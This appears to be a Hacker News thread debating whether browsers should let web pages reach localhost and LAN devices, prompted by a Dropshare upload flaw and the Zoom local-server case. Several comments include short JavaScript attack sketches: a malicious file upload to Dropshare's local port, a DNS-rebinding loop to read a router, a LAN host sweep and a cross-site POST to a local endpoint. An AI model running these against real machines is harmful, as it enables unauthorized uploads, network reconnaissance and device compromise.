I posted about another macOS app called “Dropshare.app” a few days ago [1].
I didn’t bother to write a blog post about it because my English is not good enough.
Basically, anyone who uses this app is vulnerable to cross-infection and data leaks. Assume that user John has installed this app, and hacker Alice tricks John into visiting her malicious website. On that website, she adds code that sends requests to “http://localhost:34344/upload” to upload malicious files to any of the services John’s computer is connected to via Dropshare: private servers via SSH, Amazon S3, Rackspace Cloud Files, Google Drive, Backblaze B2 Cloud Storage, Microsoft Azure Blob Storage, Dropbox, WeTransfer, and custom Mac network connections. The port number is also static, saving the attacker the need to run a port scanner.
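To illustrate the shape of such an attack, here is a rough sketch of the JavaScript a malicious page could run. Only the port (34344) and the /upload path come from the description above; the form field name and file contents are invented, since Dropshare's exact local API isn't documented here.

    // Hypothetical attack-page script. The port and path come from the
    // report above; the form field and file are made up for illustration.
    const payload = new FormData();
    payload.append("file", new Blob(["malicious content"]), "evil.sh");

    // "no-cors" means the page cannot read the response, but the request
    // itself is still delivered to the local Dropshare server.
    fetch("http://localhost:34344/upload", {
      method: "POST",
      mode: "no-cors",
      body: payload,
    });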
I already contacted Dropshare’s developers to fix the issue, but got no response.
Certainly. I'm a non-native speaker myself and although the end result looks somewhat convincing, it takes me an inordinate amount of time to write, look up words and proofread the text. I'd guess a native would come up with a comprehensible text on the first try, and it'd take a few tweaks until it looks immaculate. The reason non-natives seem to write better is that we simply spend more time working on it, and fix a lot of mistakes.
Just now, writing this, I had to look up if the saying went "inordinate amount" or "unordinate amount". The difference between "pristine" and "immaculate". It really adds up when writing longer texts.
Regularly consulting reference materials and editing your work are hallmarks of a good writer. It enables continuous improvement.
For what it’s worth, I think your examples are nuanced questions about fairly sophisticated terms. I look up similar things all the time, and I am a native English speaker, have a first-class education, and write regularly for my day job.
Agree with the existing reply, and I appreciate that the effort is significant for you. But it's also worth noting that everybody would have still gotten your meaning if you'd swapped that 'i' for a 'u'. In a technical document a subtlety like that is important; in a forum post, things can slide around a bit. I'm a native speaker and I'm sure I make mistakes like that. Certainly I do in speech.
I’m intrigued by https://www.grammarly.com/ but it sends everything you write to their cloud service, which is completely unacceptable to me. If I can’t use the tool for proprietary and private writing, it’s useless.
I found malware in a JavaScript error notifications extension for Chrome in 2015 that affected 86k users, and the developer was mad because apparently he made some money out of it (I was called paranoid).
The malware basically logged the URLs you visited and sold them to a statistics service called Fairshare.
Agreed with the other comments, this comment = blog, looks like you know what you're talking about, short, to the point.
Good find, and thanks for sharing
off topic comment:
For all, what are people blogging on these days? I am not too fond of Medium, but I just got into Ghost and am really liking it. It seems like a great platform for short posts and resource write-ups. I have it installed on a cheap DO server. Or do people go plain text, like lapcat?
> The major browsers I've tested — Safari, Chrome, Firefox — all allow web pages to send requests not only to localhost but also to any IP address on your Local Area Network! Can you believe that? I'm both astonished and horrified.
I'm sorry, but WTF, who is this guy? Every web developer will know this, and every developer should expect it, since it's just an extension of basic networking knowledge applied to web browsers. It's not horrifying, it's the basics; a great many things have depended on this fact to function for a very long time.
Yes functionality can work against you when abused, no this is not a special case.
This is Hacker News. We all know this. That's not the point. The point is: is it reasonable in 2019 that websites you visit can make requests to devices on your local network?
To be honest I'm not sure. But I sure think it's a relevant discussion to have.
There's no uniform criterion for "local network". I can create a local device at any address I want. These days most are within 192.168, 172.17, and 10., but not all.
As an example of legitimate use, Ubiquiti routers have a web app at ubiquiti.com that opens connections to manage your local routers. It's all authenticated with cookies. It seems like a good design.
> There's no uniform criteria for "local network". I can create a local device at any address I want.
Certain subnets are always private [1], and thus may safely be treated as “local”. Of course, non-private addresses can also be local, but that’s less common in a non-enterprise setting.
This isn't a local network issue, though; this is a cross-origin issue that browsers definitely need to patch.
A script from the internet should not be allowed to interface with a script from the local network (localhost, local intranet, etc.).
The browser should have strict sandboxes. This is like when you load a site over HTTPS: browsers scream at you if you load an HTTP resource, saying it's insecure.
Cross-origin is based on the domain name. It offers no protection against an attacker poking your local IP addresses.
You can have multiple IPs for a domain name, so if I set "hack.tlb.org" to include both a server I control and 192.168.1.1, I can repeatedly do fetches from "hack.tlb.org" until one of them gets your router instead of my server. And they're in the "same origin" for CORS purposes.
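Roughly, the attack page could look like the sketch below, using the hypothetical hack.tlb.org from above; this glosses over DNS caching and connection reuse, which a real attack has to defeat.

    // Sketch: hack.tlb.org publishes A records for both the attacker's
    // server and 192.168.1.1. Every request is nominally same-origin,
    // so once a fetch happens to reach the router, the page may read
    // whatever it returns.
    async function probeRouter() {
      for (let i = 0; i < 50; i++) {
        try {
          const res = await fetch("http://hack.tlb.org/?attempt=" + i);
          const body = await res.text();
          if (!body.includes("ATTACKER_MARKER")) {
            return body; // didn't come from the attacker's server: likely the router
          }
        } catch (e) {
          // network error; try again
        }
      }
      return null;
    }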
You log into app.plex.com, which will connect to yourserver.account.plex.local or something like that, which resolves to an IP on your LAN. Your server will then feed the web page app with data, without going via your WAN link.
Thanks - I had no idea that Ubiquiti webapp existed!
How about those internal-by-spec ranges + localhost as "security popup/alert" in major browsers? Or default deny with a popup to allow?
I really struggle to see why "legitimate use" that makes up a minority of all use cases should prevent a consensus on cordoning off a major attack surface, with an affordance for that legitimate usage.
It isn’t really a “major attack surface” and it would be better to configure routers to rewrite DNS responses within the subnet that they control by default than to add an arbitrary set of rules to browsers, breaking all sorts of developer tools and other useful functionality.
Also, legitimate services on the local network have tools like CORS and CSPs as well as standard anti-XSS and anti-CSRF techniques to use to defend themselves.
Wait, which is easier/more feasible - adding security to browsers which restricts a fringe usage, or corralling all the router manufacturers to update their software to rewrite DNS responses? Wouldn't it result in the same outcome anyway?
Based on history I know which group I would expect to implement first.
Some larger companies use public IP addresses for everyone's desktop, but they're still behind a firewall. So these are "local" in the sense of behind their firewall, despite being "publicly" routable addresses.
An attacker can create a domain name pointing to any IP, including 127.0.0.1 and 192.168.1.1. So browsers won't gain any security by looking at the domain name.
Totally agree. I don't think it makes sense for an arbitrary website to send requests against shitty IOT devices in someone's home, for example. Yes, you could argue that mom should be putting her IOT devices on a VLAN, but come on. The obvious, ethical solution is for the browsers to implement this layer of protection and make it obvious to the users when an access is attempted.
1: not everyone is a software developer here and 2: not everyone is a web developer. I've barely done front end stuff and do almost exclusively backend stuff so I didn't know that.
So does that mean any tab I have open on my computer can try to talk to my local development MySQL server and my local development web server? That's crazy. Wasn't there also an article in the past year about how a bunch of IOT devices run unsecured on the LAN because they assume they are secure?
It’s interesting you say this. I work as a web developer, I consider myself to be more or less well versed in security, and it would have never occurred to me that websites can make requests to devices inside the standard private blocks of addresses. I think it stands to reason that these requests should be blocked in the same way requests to the file:// protocol are blocked.
There are. Let them set a setting or confirm on a popup. The vast majority of web users do not want this.
Similarly, there are legitimate reasons why I might want to access a service with an invalid SSL cert. They're rare and should be discouraged for general users.
The vast majority of users don't want CSRF-able software either. Let's first discourage such garbage software before making workarounds. In addition, those workarounds most likely will not eliminate all the possible issues, and buggy software will still get exploited.
This isn't about 'garbage software'; it's about the expectation that a local LAN is not exposed to the Internet and therefore does not need the same security controls that an Internet-facing network does.
Browsers making requests on the LAN breaks this expectation.
Before someone says "but I don't expect that", well, why do you even have a firewall? With the notable exception of Google/BeyondCorp, practically every LAN in the world expects to trust its members. Having untrusted code in browsers able to send requests on the LAN violates that expectation.
a) You can't establish a plain TCP connection with arbitrary content using a browser.
b) Expecting the LAN to always be secure, or to be okay to leave unsecured, is a terrible assumption that has been proven wrong numerous times; it is time to trash that assumption once and for all.
Implementing CSRF protection doesn’t stop an outside party from finding out that you have (for example) an Apple TV inside your network. The device will still return an HTTP status code. You could genuinely spy on end users this way. A real boon for ad tech, too.
Such specific detections could be countered by Apple, and it serves no good adtech purpose to learn that some small number of devices exists on a LAN.
In general, though, this wouldn't be a problem on proper IPv6 LANs, and instead of building buggy and cumbersome workarounds into browsers we should just switch.
> How is the browser supposed to reason about "local"?
That isn't even the issue. It's that there is nothing inherently wrong or unusual with mixing local and internet requests.
Look at IPFS -- it runs a webserver on localhost which you can request content from by using content hashes. There is nothing wrong with a website on the internet which anticipates that you have IPFS installed and uses it to request page elements. It can even use javascript to detect whether you have it and use a different (e.g. slower or more expensive) source for the content if you don't, or show a message explaining how to install it.
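A sketch of that detect-and-fall-back idea, assuming the default local gateway port (8080), a placeholder content hash, and a gateway that allows the cross-origin probe:

    // Sketch: prefer a local IPFS gateway if one is running; otherwise use a
    // slower public gateway. The hash is a placeholder, not a real object.
    const hash = "QmPlaceholderHash";
    const localUrl = "http://127.0.0.1:8080/ipfs/" + hash;
    const publicUrl = "https://ipfs.io/ipfs/" + hash;

    fetch(localUrl, { method: "HEAD" })
      .then(() => useSource(localUrl))    // local node answered
      .catch(() => useSource(publicUrl)); // no local node (or blocked): fall back

    function useSource(url) {
      document.getElementById("content").src = url;
    }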
Or you have a company with some internal servers where some of them have public addresses (or public IPv6 addresses) while some don't, but they arbitrarily access resources on the others because they're all managed by the same people.
This isn't a browser problem. Browsers are supposed to work this way.
Yes, exactly. This should be a top-level comment. The uninformed delirium over intentional and useful browser features moves us in a slow crawl towards a sad husk of what the Web used to be in the name of 'security'.
The web has changed. It has become a vastly more hostile environment. In my view, the appropriate way of acknowledging this change is to prioritize security over features. Whether a feature is useful or not is no longer the primary consideration.
A denial of service doesn't improve security. All you do is get users to mash whatever knobs they can find until it starts working again regardless of the implications, or disable updates so they can keep using the old version that works instead of the new version that doesn't.
You need to fix the things that are broken instead of breaking the things that are working.
There are 3 well defined private network ranges, 1 loopback range and a few other random things. It's not silly to ask whether an address outside of them should be able to initiate connections to them. (In the context of a browser running on that network that is)
I would suggest that all requests must require a DNS lookup. No requests directly to IP addresses, full stop.
This prevents LAN enumeration from random websites. This is not a big deal for most home networks, but I shudder to think of the damage one could do in a standard corporate network.
It doesn't help with routers with well-known config URLs.
Yes, I realize that this will break a bunch of stuff.
(Edit: OK, DNS rebinding mostly breaks this proposal. Let me think about this harder.)
How would this help at all? You could just have your domain return various LAN IPs for different subdomains... there are already a ton of domains that resolve to 127.0.0.1. It would be trivial to make your own that covers every possible IP, something like 127.0.0.1.myfakedomain.com, where the server dynamically extracts the IP and returns it.
So, when a company decides to run internal services for its non-technical employees on its internal network, now they have to make sure that all the user’s devices on the LAN (including BYOD devices) are configured properly?
Cool, so make it drivable via policy files like e.g. client cert pinning in Chrome. Industry has solved these problems, making excuses for fixing it is not good at this point.
What if your DHCP doesn't give you a private IP address? When I was at the University of Michigan, my personal laptop always received a public IP address. Or if I'm in a pure-IPv6 setup, using prefix delegation/SLAAC? This problem is a lot harder than "just use the RFC1918 list of reserved private IP ranges".
The UMich network isn't "improperly configured". NAT-less networks have been around since the beginning of the Internet, and IPv6 networks don't use NAT (unless they're accessing IPv4-only targets, but that's CGNAT). I think you'll find a great deal of university/research settings have networks configured without NAT. If you can come up with a solution that works in all cases, I'd love to hear it.
So web browsers are user agents, i.e. they act on your behalf. This is great because we can avoid heated arguments about what websites "should" or "shouldn't" be able to do as it's ultimately up to the user.
I assume you've already setup the relevant browser settings and extensions to enforce a user-defined CSP that blocks all further requests? If so, then great, your browser won't make any requests when you visit sites. And my browser will (apart from what I've blocked with other more selective extensions). We're both happy.
This is not ad hominem, this is me calling out a person's shallow criticism of a technical detail with no attempt to understand the history and background of one of the most unobscure features of networking, and the audacity to proclaim to the world how shocking and terrible it is.
It's essentially 2nd order ignorance, it's not personal, it's relevant to the validity of their argument.
Users need to follow the site guidelines regardless of how ignorant someone else is or how strongly you disagree. Maybe you don't owe the author better, but you owe this community better if you want to post here.
The online calling-out and shaming culture is particularly unwanted on HN. It has a degrading effect on the community.
> a great many things have depended on this fact to function for a very long time
Such as? Breaking "website makes a call to local (localhost or RFC1918) web server" would be a feature; any use of this is an abuse. It'd take a transition period and some careful opt-outs, but any kind of call to a local web server should require the same kind of special privileges a browser extension needs, at the very least.
It's a bug. Calling it out is the right thing to do. If you're complaining that the author should have known about it already, then you're just mocking someone for not already knowing a particular fact; that shouldn't stop them from writing up a report on it and trying to get it fixed.
EDIT: please note that I'm talking about calls from Internet origins to localhost/RFC1918 origins here, not calls from one Internet origin to another or one localhost/RFC1918 origin to another.
This is not a bug. It is a feature. It's called a cross-origin request and numerous websites depend on it. The recipient website needs to be CORS enabled, so it is secure. The author's report is misinformed, and pretending Apple should implement some feature outside of standards is silly. Yes, this feature could be improved, but not by disabling it or by making Apple become standards non-compliant
I feel that the distinction between internet and local is unnecessary. Isn't it equally bad if someone sends a request to your CORS-broken local webcam as it is if they send a request to your CORS-broken bank account?
Or does SOP not apply to local addresses?
I think for all cases it could make sense to enable the user to also approve CORS requests instead of just the cross origin website itself (since they are often insecure).
> Isn't it equally bad if someone sends a request to your CORS-broken local webcam as it is if they send a request to your CORS-broken bank account?
This comes from the same line of thinking as "shouldn't every device have a routable IP?". Yes, in theory, but a long history of not having one has made people more lax about local systems and securing services. And until the vast majority of local services address their security issues, we shouldn't make them accessible.
> Or does SOP not apply to local addresses?
It should, but that's not the world we have. Yes, we should fix the million local devices with CSRF/CORS/etc issues. We should also have an extra layer of protection in web browsers to prevent this. Defense in depth. (And note that many local devices do this intentionally, to give a website more permissions, as in the case of Zoom. The local web server wants to make itself accessible to the Internet; browsers should prevent that.)
This complaint is real cute, but the trite answer is that this is how things have worked for a long time. Awareness of it spreads for a while whenever high-profile events receive media and blog coverage, and perhaps the exploitability of this has increased compared to several years ago, when products that opened up various HTTP-accessible servers were less common (or secured by obscurity).
This isn't necessarily an excuse not to explore mitigations through consensus in future browser behavior -- after all, that process of loose but eventual consensus on incremental UX and airquote "security" improvements is how SOP and CORS and CSP came about [1] and how the cookie saga evolves [2][3].
But consider that legitimate uses of cross-domain requests to localhost exist (e.g. an OAuth callback endpoint). Also keep in mind that users from all walks of life are, perhaps unbeknownst to them, managing LANs of computing devices running dozens of servers, often with modern encryption such that communications between a program and its remote server are becoming harder to intercept and oversee, while those users lack a comprehensive capability to monitor, analyze, blacklist, whitelist, or snipe traffic in a way that isn't cumbersome or borderline user-hostile. Such is the world where we've arrived. Etching away at one or two widely deployed corners of it won't fix the overall landscape, even if it may significantly reduce the chance of "drive-by" exploitation through websites accessed through commonly used browsers.
First, I think this is right and that websites shouldn't be able to hit any localhost or private address spaces.
But this leads to a bigger question: what makes private address space special? Not really all that much. Running an internal network using public addresses isn't super common these days, but it isn't rare by any stretch. Does it make any sense that any website on the internet is allowed to hit any other site accessible by your machine that uses a public address? There is definitely a security boundary being crossed here.
Say, for example, I run a web service that's private to my work's office. So I spin up a machine on my VPS account, give it a public address, and lock down the firewall to my office's address range. Someone running Spotify in a browser shouldn't have to worry about a malicious page hitting a potentially sensitive internal service.
Does it make any sense for me to have to establish a VPN connection to my VPS for the sole purpose of giving it a private address so browsers will block it? Ew. I could also configure a CORS policy, but we're talking about a service that used a trick to bypass that protection -- and besides, nobody knows how to set that up right anyway.
By default, browsers do block sites from doing dangerous things to other sites, like sending authenticated API requests; they only let by stuff that is supposed to be harmless, like hotlinking images. And then they have a mechanism called CORS that lets those services say "this particular site can make API requests and such".
The problem is that Zoom, since they didn't understand CORS, and yet did want to allow their site to make API requests, turned what should have been a harmless action (GETting an image) into a dangerous one.
Browsers could block everything, but all I think would happen is that Zoom would just find some other silly (and potentially more dangerous) way of doing the same thing, because they want the site to be able to talk to the service.
If you're writing your own service to be used on an internal network, you don't need a VPN or anything. Just don't accept unauthenticated requests that make changes, and ignore CORS.
> Just don't accept unauthenticated requests that make changes, and ignore CORS.
The problem here is that it’s really pretty trivial to scan a local network and get valuable metadata about the router and other devices on the network, just using JavaScript and xmlhttprequest. It’s not that the local services are at risk of being exploited, but the whole (average, unhardened home-) network could be compromised by identifying devices with known exploits and, well, exploiting them.
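A sketch of the kind of scan meant here (using fetch rather than XMLHttpRequest, same idea); the address range is just an assumption about a typical home network, and the page never reads any response, it only observes whether the request succeeds at the network level.

    // Hypothetical LAN sweep. With mode "no-cors", the promise resolves
    // (opaquely) if anything answered at all, and rejects on a network
    // error, which is enough to map which hosts exist.
    async function sweep() {
      const alive = [];
      for (let i = 1; i < 255; i++) {
        const host = "http://192.168.1." + i + "/";
        try {
          await fetch(host, { mode: "no-cors", signal: AbortSignal.timeout(1000) });
          alive.push(host);
        } catch (e) {
          // no response within the timeout: probably nothing there
        }
      }
      return alive;
    }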
Now I’m trying to come up with a non-PITA way of isolating browsing from my local network while still allowing direct access to my local network!
> Now I’m trying to come up with a non-PITA way of isolating browsing from my local network while still allowing direct access to my local network!
UMatrix will protect you from most of this (with the exception of DNS rebind attacks).
I don't necessarily disagree with people who are frustrated that their browser can do this, but I also think it's completely reasonable to make it easy for browsers to send requests on an intranet. There are multiple devices in my house that wouldn't work without that capability.
The "problem", to the extent that there is a problem, is that securing these devices relies on developers doing the right thing -- and developers are untrustworthy. Theoretically, it would be better to put users in control. But that's not a specific problem with Intranet requests, that's a problem with CORS in general as it applies to the entire Internet.
> it's completely reasonable to make it easy for browsers to send requests on an intranet
Agree. But shouldn't we distinguish a request that originates from the local user's input into the browser from one that originates from a remote entity? I'm slightly ignorant here; maybe this isn't technically possible?
It's always been the case, back to NCSA Mosaic in 1993, that web pages could hit URLs of local web servers. Before JavaScript, you had to use an embedded image.
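Something along these lines, for example; the port and path are invented, and any local HTTP endpoint works the same way:

    <!-- The page embeds an "image" whose URL points at a local server;
         the browser issues a GET to it as part of rendering the page. -->
    <img src="http://localhost:8080/some/endpoint" width="1" height="1">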
Fortunately, most protocols bail out on the first 4 bytes "GET ". One of the reasons that Gopher support was phased out was that you could make a gopher request contain more or less arbitrary bytes and attack many local servers.
Servers have always had the burden of defending against this.
I believe some networking equipment lets you go to "www.routercompany.com", which loads up the router's config webpage without having to remember its LAN IP.
How do you differentiate between a valid and invalid request to localhost / the LAN?
Lots of websites will link to something like `http://localhost:9200` (e.g. Elasticsearch) in the documentation.
So you decide to make it impossible to load that page in the context of a page loaded from a public IP address. Great.
What is stopping them from tricking you into clicking it (or filling out a fake form), which is basically the same thing?
You haven't really solved the problem. You've just made it slightly more difficult.
The solution is:
a) fix your applications so that they do not expose unsafe endpoints that can cause unintended side-effects merely by navigating to them
b) stop using session cookies (at least stop using them alone) to authenticate actions. Use token-based authentication (like CSRF tokens)
Edit: and before you say "check the referer header!", no, that will not solve the problem. The bad web page can simply not include the referer with something like `rel="noreferrer"`
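To make (a) and (b) concrete, here is a minimal sketch of a local endpoint that only performs state changes when the request carries a token the legitimate client was given out of band; the port, header name, and token handling are all invented for illustration.

    // Hypothetical local server: GETs have no side effects, and
    // state-changing POSTs require a secret token, so a drive-by
    // cross-site request from a random web page is rejected.
    const http = require("http");
    const crypto = require("crypto");

    const TOKEN = crypto.randomBytes(32).toString("hex"); // shared only with the real client

    http.createServer((req, res) => {
      if (req.method === "GET") {
        res.end("status: ok");            // read-only
      } else if (req.method === "POST" && req.headers["x-csrf-token"] === TOKEN) {
        res.end("action performed");      // authenticated state change
      } else {
        res.statusCode = 403;
        res.end("missing or invalid token");
      }
    }).listen(12345, "127.0.0.1");

A cross-site page can't even attach that custom header without triggering a CORS preflight, which this server never approves, so the dangerous path stays out of reach.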
> How do you differentiate between a valid and invalid request to localhost / the LAN?
With the same origin policy? I think the post advocates for something like allowing localhost and private IP addresses only from those very same addresses or from the URL bar. Any other page shouldn't be able to access them.
This will probably break something, but what's the case for a web app legitimately accessing localhost? Maybe access to some local service installed by the user and managed "from the cloud".
Define "access". The SOP does not stop a page from initiating a request to any other origin, it stops it from interacting with it, so that, e.g. attacker.com cannot steal your session cookies from banking.com
You can do all kinds of things that don't violate the SOP but initiate a request:
- Link to another site
- Redirect someone to another page using Javascript
- Link an image from another site
- Put a form that submits data to another site
- Embed video/audio from another site
- Embed an iframe from another site
Do you propose disallowing all of those things?
There are plenty of legitimate use cases for all of these things.
If you wanted to do this you would have to disallow any type of links to local servers.
Every one of those are solved by CSP/X-Frame-Options headers, CORS headers with content-type (non-normal form content-types) checks and proper handling of HTTP Methods. DNS rebinding is solved by https, and if you are doing something sensitive over a network (even a local one) I'm going to assume https is the proper way.
We have ways of handling these things, they just require a bit of reading/implementation and are unfortunately non-default.
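As a rough illustration of the non-default bits, a local service's responses could carry something like the following (the allowed origin is made up), on top of rejecting unexpected Content-Types and methods:

    HTTP/1.1 200 OK
    X-Frame-Options: DENY
    Content-Security-Policy: default-src 'self'
    Access-Control-Allow-Origin: https://app.example.com
    Vary: Origin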
Which is sort of exactly my point. There is no need to have a blanket ban on any linking between local/non-local sites. You just need to make sure they are set up to handle requests securely.
Also, like someone already mentioned. DNS rebinding is a thing. So the SOP can be subverted under certain circumstances (browsers will do DNS pinning to protect against this but it's not a perfect solution)
A confirmation might be helpful, yes. I think the challenge is to design a standard for that which won't completely flood people with warnings. I'm sure there are some "enterprise" applications that will load a ton of different resources from different services on an internal network. So would you have to click a confirmation box for every single one? Or would there be a way for administrators to disable it somehow?
There are legitimate reasons to run a webserver locally. However, the benefits of these restrictions are too great not to consider some sort of protection. Perhaps there could be an authorization request the user could allow (similar to how we got rid of pop-ups), done in the most natural way possible (we don't want to break intranets, for example).
Another security-related bad pattern that annoys me is how some of this authorization stuff steals your focus, making it impossible to ignore (like when you cannot move to another tab before deciding whether to allow something).
Another thing is how sometimes it is not completely clear whether something is an element of a website, your browser, or your system. For example, imagine you have to type your user password for a random update to complete, but you are browsing some website. Suddenly you see a prompt with your username and a password field matching your system's. You can only know for sure this isn't phishing if you cmd+tab and it is still there. Heck, the system should detect that you are looking at a window showing unsigned/unsafe content and paint something outside the frame (like coming from the top address bar) so you can easily identify that it's legit (because a website shouldn't be able to draw on a portion of your screen outside its window).
> In my opinion, web pages should not be allowed to make requests to LAN addresses unless the user has specifically and intentionally configured the browser to allow this.
Is there a way to know definitively if an address is "local" rather than "wide"? Should that be more granular, e.g. host, LAN, WAN? How does that work with bridged networking and such?
If I'm already browsing something on the LAN, it seems reasonable to be able to browse other sites on the LAN. But then that seems like an overly broad definition of LAN would allow privilege escalation.
If I saw a private IP (192.168, 10, etc) or a .local domain, I'd assume that was a LAN address, but that's a convention and depends very much on routing being set up properly.
> If I saw a private IP (192.168, 10, etc) or a .local domain, I'd assume that was a LAN address, but that's a convention and depends very much on routing being set up properly.
This convention on the address is actually backed by RFCs, e.g. RFC 1918. There is a similar one for IPv6.
However, blocking traffic to private IPs without careful consideration seems like it could block some legitimate use. So one does have to tread carefully when special-casing those.
I knew that localhost could be accessed, but the fact that local IP addresses on the LAN can be accessed is actually quite surprising to me. I suppose it makes sense, but it definitely makes me much more concerned with the security of local devices on my home and office networks now.
Are there any best-practices for keeping things locally safe (i.e. LAN devices like printers, testing boxes, tvs etc.) , beyond just treating them the same way you would an external facing machine?
Yes, there are quite a few attacks on default local credentials for home routers because of this. Now if only home routers were better about actually following through on changing credentials..
Yeah, forget about home, this is a nightmare. Who knows how many devices are in a corporate network. Internal networks are usually not as well protected as the perimeter.
Jonathan Leitschuh shared the same complaint in his original writeup of the Zoom Zero Day, but also mentioned CORS-RFC1918 – a proposal to obtain permission from the user before allowing a public website to access a resource that DNS lookup reveals to be hosted on the private or local address space as defined by RFC1918:
Wait wait WAIT! It is much more complicated than that.
You can make XHR (aka AJAX) requests only if the CORS policy allows it (concretely, only if the local web server you are trying to access answers with a specific HTTP header saying "I authorize the website xyz.com to send XHR requests to me via the web browser of xyz.com's visitors").
Now, for everything outside of XHR (AJAX), you can send different types of requests:
<script src="..."></script>, but this only lets you load JS files.
<img src="..." />, but this only lets you load images; you can't really do much other than try to load images with that.
So if you get into the details of each "web api" (XHR, <img/>, <script/>, etc) you will see that you are actually very limited.
I worked in a company that used custom DNS names to identify the environments:
- www.mydomain.com
- stage.mydomain.com
- local.mydomain.com
The last one referred to the version of the app that developers ran on their own machines. So they had a DNS-level entry that sent local.mydomain.com to 127.0.0.1.
This isn't a browser issue at all. I think the security issue is "applications can install local web servers" and "some local web servers are insecure".
We already have XSS controls in place to prevent a domain from accessing the contents of another browser window or an iframe.
It's not a browser issue. There are plenty of legitimate reasons for wanting a browser to access a local web server. It might not be common, but it's not illegitimate nor a security issue.
Yep, I have a subdomain under a personal domain pointing to a few specific 192.* addresses and localhost. It makes it easy to test HTTPS stuff without having to jump through hoops (and with Let's Encrypt it's free).
> In general, there's no reason why a page on the internet should be allowed to access devices on your local area network. Of course, if the user enters a LAN IP into the browser location bar, this should be allowed, but that's not a cross-origin request.
What's a local area network? 10.x.x.x? That's going to break VPNs and enterprise integrations in a variety of ways. With IPv6 it's even less predictable.
The solution to this problem is CORS — accessing LAN servers, or any cross-origin destination, requires affirmative consent from the LAN server in the form of the Access-Control-Allow-Origin header.
Perhaps I should have said "The solution to this problem is _properly-implemented_ CORS." My point is that browsers already have a mechanism for mitigating this particular problem and I don't think the additional proposed mitigation (restricting browser access to localhost/LANs) would break a lot of legitimate usage without much benefit.
There's only so much browsers can do to mitigate hostile code running on the machine. CORS won't save me if Zoom decided to wipe my hard drive, you know?
You is you. The user.
I do not control the Zoom local server, and I do not control what the Zoom server answers as the CORS header.
Having CORS enabled in my browser does not save me from anything in this case.
I too was wondering how this could work in IPv6.
There is no equivalent of RFC1918 for IPv6, and filtering link-local addresses won't do much, as every host on the LAN is still addressable by its publicly routable address. Those are probably too hard to predict, though.
You mean with image requests or something, right? Actual fetch() and XHR won't even tell JavaScript that a server exists unless it passes the CORS preflight check.
I don't see any problems here. Even though they are on the same LAN, they are still on a different host, and thus subject to CORS restrictions.
That is, as long as your devices on the LAN do not send an Access-Control-Allow-Origin header, web pages are not capable of getting the actual response. Also, the only HTTP methods available to them are GET (when preflight is not required) and OPTIONS (when preflight is required), which are methods that are almost always side-effect free and only return some value -- which the script cannot even read due to CORS restrictions.
I do agree in principle that web browsers probably should not allow non-local web sites to make requests to local IP addresses.
However, I don't really see that as the fundamental problem with the Zoom web server. They just happened to use local web requests to externally trigger the Zoom application, because it's probably the most convenient to implement. But couldn't they have, at least in theory, had the Zoom application snoop on the display output until it finds an image of a QR code and open a conference call based on the data in that QR code?
Obviously that's a more intensive listening mechanism, but my point is that the fundamental problem seems to be that their application installs a backdoor that is designed to expose the webcam without confirmation based on user actions that do not necessarily imply intent (like clicking on a web link). The local web request thing is really just an implementation detail: one that probably should be fixed by browsers, but far from the only way Zoom could have implemented this feature.
After all, the Zoom client could just have a socket connection to Zoom's servers, and start a conference call whenever someone requests one. That's how all native apps for conferencing/messaging work. They just usually require confirmation from the user, and they usually (I hope) uninstall that process when I uninstall the app, so people tend to be less upset.
DNS rebinding attacks leverage this very behaviour, and they have existed for years. Nothing new. And I think fixing the approach is complex and error prone. I can still make the browser connect to myhost.mydomain.com and have it resolve to 127.0.0.1 -- what then?
Of course if your local webservers have a really open CORS header, that could be a problem. But it's a matter for local webserver, mostly. And DNS rebinding still applies.
To mitigate this, I configure my LAN’s DNS server to drop records which specify local or private addresses. Of course, this doesn’t help outside my LAN. In Unbound:
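A minimal sketch of the relevant unbound.conf directives: private-address makes Unbound scrub upstream answers that point into those ranges, and private-domain whitelists zones that legitimately resolve to them.

    # Sketch: drop RFC 1918 / loopback answers coming from upstream
    # (DNS-rebinding protection).
    server:
        private-address: 10.0.0.0/8
        private-address: 172.16.0.0/12
        private-address: 192.168.0.0/16
        private-address: 127.0.0.0/8
        # zones that may legitimately resolve to private addresses:
        # private-domain: "home.example"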
I recently posted a blog post that exposed a similar issue involving Chrome extensions. The issue in particular is how LinkedIn makes local web requests to try and identify which extensions you have installed: https://prophitt.me/articles/nefarious-linkedin
This approach was used for years by Spotify[1], to allow websites embedding their player to load content directly into a running instance of the desktop app.
The browser doesn't know by default what websites should be accessed. They don't know that l337haxor.dev doesn't have access to api.bank.com but bank.com does.
Instead it's the server at api.bank.com 's responsibility to tell the browser it only accepts requests from bank.com.
It is absolutely the job of the server to determine the source and validity of a request. Web browsers, for better or for worse, fundamentally allow websites to make requests to other sites. "Rogue" websites can "trick" users into requesting images, videos, music, javascript, stylesheets or trick users into making POST requests to your site. This is why tech like csrf tokens exist.
Pretty much all modern browsers allow access to localhost, even from TLS pages. They treat localhost as though it were TLS so it's not even demoted to "mixed content".
And beyond that they also allow mixed content for asset requests from TLS pages to non-TLS URLs of any IP address (for instance an AT&T modem configuration page at 192.168.1.254).
But it was able to successfully ping my running Steam client. The page works like an acid test: if it's clean, you're clean; if it finds something, it says what it found and on which port.
Real fun times is the fact that -on Linux machines- something like this will cause Steam to freeze and even crash certain games just by visiting the page: https://wybiral.github.io/steam-block/
Zoom got around the CORS restriction by requesting an _image_ which is not subject to CORS. So there are some limitations of what can be done and how you can access things. But you could certainly use this technique to do some simple IP/port scanning on a user's local network.
Just to be clear: There's no need to "get around" CORS in the Zoom case. Browsers simply allow cross-domain GET and POST requests. Period.
CORS mediates the ability of JavaScript running in one origin to _read_ responses from another origin. If Zoom wanted JavaScript on any site to read data from the local installation, their local web server would need only return appropriate CORS headers. This was not necessary for the use case of joining a meeting.
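For example, a page can fire off a state-changing "simple" request without any preflight and without ever being able to read the reply; the port and path here are made up for illustration:

    // Hypothetical: a cross-origin POST with a CORS-safelisted content type
    // needs no preflight. The browser sends it; the page just can't read
    // the response. If the target acts on it, the damage is already done.
    fetch("http://localhost:12346/launch", {
      method: "POST",
      mode: "no-cors",
      headers: { "Content-Type": "text/plain" },
      body: "meeting-id=1234567890",
    });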
This is my understanding too, but judging from the comments in this thread, either a lot of developers aren't clear on the difference between CORS and CSRF or else they're referring to aspects of CORS I'm not familiar with.
It is true. But then, it's an intentional bad design choice by whoever wrote the server. If your server performs actions on a GET, or accepts POSTs without CSRF token protection, that's not the fault of the browser, but a well known behaviour.
"Simple requests" are exempt from CORS. Images are one way, but any GET request without special headers and with a specific subset of content types will qualify and is exempt from CORS. Certain simple POSTs too, if my memory's not too bad.
